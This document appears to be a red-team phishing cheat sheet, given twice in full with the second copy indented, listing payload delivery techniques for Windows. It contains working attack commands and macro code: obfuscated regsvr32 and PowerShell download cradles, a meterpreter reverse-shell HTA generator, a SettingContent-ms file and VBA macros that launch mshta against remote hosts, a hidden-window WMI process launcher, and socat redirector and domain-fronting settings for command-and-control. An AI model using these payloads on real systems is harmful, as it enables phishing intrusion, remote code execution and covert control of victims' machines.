adon90/phishing.txt

## phishing.txt
1. Macro Web_Delivery + Invoke-Obfuscation

Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'


e.g

import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'


2. Generate Macro (by enigma0x3)

iex(New-Object net.webClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generat
e-Macro/master/Generate-Macro.ps1');

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1


3. Macroless OLE SettingContent-ms


python unicorn.py windows/meterpreter/reverse_https IP 443 hta


--------------------------
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>
--------------------------

* Nota, dar permisos 644 a la Database en el C&C


4. .MAM Access Database


------------------------------
Public Function runme()
runcalculator
End Function

Sub runcalculator()

Shell ("mshta.exe http://IP/LICENSE.txt")

End Sub
------------------------------


5. SyncAppvPublishingServer


--------------------------------------------------
Sub Macro()

Dim x64 As String
x64 = "SyncAppvPublishingServer.exe ""n;WEBDELIVERY_PAYLOAD_W/O_POWERSHELL"""

Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create x64

End Sub
--------------------------------------------------------


6. Domain Fronting + Phishing


Redirector:

socat TCP4-LISTEN:443,fork,reuseaddr TCP4:<C&C IP>:443


C&C:

set LHOST mscrl.microsoft.com

set HttpHostHeader xxxxxxxxxxxxx.azureedge.net
	1. Macro Web_Delivery + Invoke-Obfuscation

	Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'


	e.g

	import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'


	2. Generate Macro (by enigma0x3)

	iex(New-Object net.webClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generat
	e-Macro/master/Generate-Macro.ps1');

	https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1


	3. Macroless OLE SettingContent-ms


	python unicorn.py windows/meterpreter/reverse_https IP 443 hta


	--------------------------
	<?xml version="1.0" encoding="UTF-8"?>
	<PCSettings>
	<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
	<ApplicationInformation>
	<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
	<DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink>
	<Icon>%windir%\system32\control.exe</Icon>
	</ApplicationInformation>
	<SettingIdentity>
	<PageID></PageID>
	<HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
	</SettingIdentity>
	<SettingInformation>
	<Description>@shell32.dll,-4161</Description>
	<Keywords>@shell32.dll,-4161</Keywords>
	</SettingInformation>
	</SearchableContent>
	</PCSettings>
	--------------------------

	* Nota, dar permisos 644 a la Database en el C&C



	4. .MAM Access Database


	------------------------------
	Public Function runme()
	runcalculator
	End Function

	Sub runcalculator()

	Shell ("mshta.exe http://IP/LICENSE.txt")

	End Sub
	------------------------------


	5. SyncAppvPublishingServer


	--------------------------------------------------
	Sub Macro()

	Dim x64 As String
	x64 = "SyncAppvPublishingServer.exe ""n;WEBDELIVERY_PAYLOAD_W/O_POWERSHELL"""

	Const HIDDEN_WINDOW = 0
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = HIDDEN_WINDOW
	Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
	objProcess.Create x64

	End Sub
	--------------------------------------------------------


	6. Domain Fronting + Phishing


	Redirector:

	socat TCP4-LISTEN:443,fork,reuseaddr TCP4:<C&C IP>:443


	C&C:

	set LHOST mscrl.microsoft.com

	set HttpHostHeader xxxxxxxxxxxxx.azureedge.net